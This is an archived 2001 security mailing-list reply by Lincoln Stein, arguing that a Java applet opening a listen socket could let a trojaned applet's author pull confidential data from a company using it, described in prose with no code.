Aviram Jenik writes: > nino wrote: > > > The implications are obvious. If any host can connect to the machine > > running the aplet, you could tell java to do things like the boserver. > > If > > you have a completely open socket, its rock n' roll ! > > > > No, it's not. > > Yes, you can connect to the open socket, but the applet can't do any I/O, so > it's basically harmless (just like any other applet). The main issue, I think, is information leakage between the Web site that uses the applet and the applet's author. Consider this scenario: a Bad Guy puts out a compiled applet in the public domain that seems to do something innocent like chart business graphics. Some company then picks up this applet and uses it to display its confidential business plan to authorized hosts in branch offices. Unbenknownst to the company or the branch office, the applet has actually opened a listen socket, has accepted a connection from the applet's original author, and is currently transmitting the confidential information to an untrusted host! Lincoln -- ======================================================================== Lincoln D. Stein Cold Spring Harbor Laboratory lsteinat_private Cold Spring Harbor, NY ========================================================================
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:32:47 PDT